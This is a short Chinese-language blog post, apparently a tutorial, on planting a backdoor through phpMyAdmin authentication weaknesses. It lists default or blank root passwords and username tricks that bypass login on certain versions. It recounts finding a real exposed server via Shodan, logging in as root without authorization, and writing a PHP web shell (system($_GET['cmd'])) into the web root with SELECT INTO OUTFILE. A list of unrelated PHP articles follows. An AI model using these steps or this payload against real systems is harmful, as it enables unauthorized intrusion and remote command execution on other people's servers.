phpMyAdmin通過密碼漏洞留后門文件
- 默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
- 版本 2.11.3~2.11.4:用戶名
'localhost'@'@"
登陸,無需密碼。 - 版本 2.11.9.2:用戶名
root
登陸,無需密碼。
經測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內的(浙江省·杭州市)。
地址已手動打碼。
http://121.***.*.219:80/
登陸成功(root 權限)。
接下來你可以寫一個 outfile 到對方主機的網絡目錄下。俗稱 “留后門”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
點擊運行,不出意外便在對方主機留下了一個名為 runme.php
的后門文件。
總結
以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。如果你想了解更多相關內容請查看下面相關鏈接
相關文章
IIS下PHP連接數據庫提示mysql undefined function mysql_connect()
在很多php教程初學者都會在初次php mysql時出來undefined function mysql_connect() 錯誤提示,下面我們來分析原因中。2010-06-06php文件操作小結(刪除指定文件/獲取文件夾下的文件名/讀取文件夾下圖片名)
這篇文章主要介紹了php文件操作方法,包括刪除指定文件、獲取文件夾下的文件名及讀取文件夾下圖片名,涉及php針對文件與目錄的常用操作技巧,需要的朋友可以參考下2016-05-05php5 non-thread-safe和thread-safe這兩個版本的區(qū)別分析
從PHP5.2.10版本開始(現在有PHP5.2.10和5.3兩個版本),有None-Thread Safe與Thread Safe兩種版本的可供選擇,這兩種版本有何不同,作為使用者來說又應該如何選擇呢?下面聚友將為您講述。2010-03-03php 隨機數的產生、頁面跳轉、件讀寫、文件重命名、switch語句
剛做的一個項目中的部分代碼,包含了php中隨機數的產生、頁面跳轉、件讀寫、文件重命名、switch語句。2009-08-08